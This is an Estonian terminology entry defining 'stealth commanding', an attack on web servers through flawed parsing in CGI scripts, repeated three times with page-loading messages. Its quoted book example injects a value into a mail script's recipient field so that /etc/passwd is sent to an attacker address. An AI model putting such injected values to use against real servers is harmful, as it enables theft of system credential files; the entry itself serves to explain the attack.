stealth commanding

peitkäskrünne

olemus
rünne veebiserveri kaudu, on suunatud veebiserverit majutavale
operatsioonisüsteemile, põhineb CGI-käskude ja päringute tõlgendamise nõrkustel
= a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server

ülevaateid
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/stealth_commanding.htm

näiteid
raamatust Cybersecurity Operations Handbook:
server küsib kasutajalt teabe saatmiseks meiliaadressi ja ta skriptis on käsk open (MAIL, "|$mailprog $recipient"); väljale $recipient paigutab ründaja "joehacker @ nefariousways.org</etc/passwd",
lastes oma aadressile saata paroolifaili

vt ka
- käsusüst

Toimub laadimine

stealth commanding

peitkäskrünne

olemus
rünne veebiserveri kaudu, on suunatud veebiserverit majutavale
operatsioonisüsteemile, põhineb CGI-käskude ja päringute tõlgendamise nõrkustel
= a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server

ülevaateid
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/stealth_commanding.htm

näiteid
raamatust Cybersecurity Operations Handbook:
server küsib kasutajalt teabe saatmiseks meiliaadressi ja ta skriptis on käsk open (MAIL, "|$mailprog $recipient"); väljale $recipient paigutab ründaja "joehacker @ nefariousways.org</etc/passwd",
lastes oma aadressile saata paroolifaili

vt ka
- käsusüst

Palun oodake...

Tõrge

stealth commanding

peitkäskrünne

olemus
rünne veebiserveri kaudu, on suunatud veebiserverit majutavale
operatsioonisüsteemile, põhineb CGI-käskude ja päringute tõlgendamise nõrkustel
= a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server

ülevaateid
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/stealth_commanding.htm

näiteid
raamatust Cybersecurity Operations Handbook:
server küsib kasutajalt teabe saatmiseks meiliaadressi ja ta skriptis on käsk open (MAIL, "|$mailprog $recipient"); väljale $recipient paigutab ründaja "joehacker @ nefariousways.org</etc/passwd",
lastes oma aadressile saata paroolifaili

vt ka
- käsusüst

Andmete allalaadimisel või töötlemisel esines tehniline tõrge.
Vabandame!